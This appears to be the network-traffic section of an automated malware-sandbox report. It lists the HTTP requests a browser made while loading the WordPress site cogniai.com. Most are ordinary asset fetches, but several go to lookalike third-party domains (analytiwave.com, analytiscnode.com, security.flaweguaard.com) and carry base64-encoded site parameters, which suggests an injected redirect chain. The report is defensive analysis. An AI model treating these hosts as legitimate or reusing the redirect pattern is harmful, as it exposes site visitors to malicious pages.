              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/techze-about-76.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/custom.js?ver=1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
              Source: global trafficHTTP traffic detected: GET /releases/v5.15.4/css/free-v4-font-face.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /releases/v5.15.4/css/free-v4-shims.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /releases/v5.15.4/css/free.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/slider-techze-12-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/slider-techze-13-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/ss2-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/cyberpunk-illustration-with-neon-colors-futuristic-technology-1-scaled.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
              Source: global trafficHTTP traffic detected: GET /api/getUrl HTTP/1.1host: analytiwave.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/ss3-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/ss4-1-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/projects-ai-1.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/projects-ai-2.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-3.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
              Source: global trafficHTTP traffic detected: GET /api/getUrl HTTP/1.1host: analytiwave.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://cogniai.comsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9if-none-match: W/"34-2HFKtX0T3kgSM93i0ueL4WdTadg"priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-4.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-5.jpg HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/OpenAI-Logo-PNG.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/pngwing.com-1.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/google-logo-9831.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/SNOW_BIG.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/62067060d7b91b0004122615.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
              Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.8.1 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/css/fonts/flaticona1f9.ttf?1895e337cdf1a9a72d08e55e17b16599 HTTP/1.1host: cogniai.comorigin: https://cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://cogniai.com/wp-content/themes/techze/css/flaticon.css?ver=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4
              Source: global trafficHTTP traffic detected: GET /wp-content/themes/techze/css/fonts/Flaticon.woff HTTP/1.1host: cogniai.comorigin: https://cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://cogniai.com/wp-content/themes/techze/css/flaticon.css?ver=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4
              Source: global trafficHTTP traffic detected: GET /A3fB7c10eD2aF5b8/?wsid=cogniai.com&domain=Y29nbmlhaS5jb20=&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n HTTP/1.1host: analytiscnode.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: documentreferer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/ss2-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/cyberpunk-illustration-with-neon-colors-futuristic-technology-1-scaled.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/ss4-1-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/ss3-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /9a8B7c6D5e4F3a2B1c0D9e8F7a6B5c?wsid=cogniai.com&domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n HTTP/1.1host: security.flaweguaard.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"referer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
              Source: global trafficHTTP traffic detected: GET /releases/v5.15.4/css/free-v4-font-face.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /releases/v5.15.4/css/free.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /releases/v5.15.4/css/free-v4-shims.min.css?token=e8bbb49528 HTTP/1.1host: ka-f.fontawesome.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVtYl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n HTTP/1.1host: security.flaweguaard.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"referer: https://cogniai.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=0, i
              Source: global trafficHTTP traffic detected: GET /api/getUrl HTTP/1.1host: analytiwave.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/projects-ai-1.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/09/projects-ai-2.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-5.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-4.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/12/small-project-3.jpg HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/OpenAI-Logo-PNG.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/SNOW_BIG.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/pngwing.com-1.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /api/getUrl HTTP/1.1host: analytiwave.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/62067060d7b91b0004122615.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/google-logo-9831.png HTTP/1.1host: cogniai.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
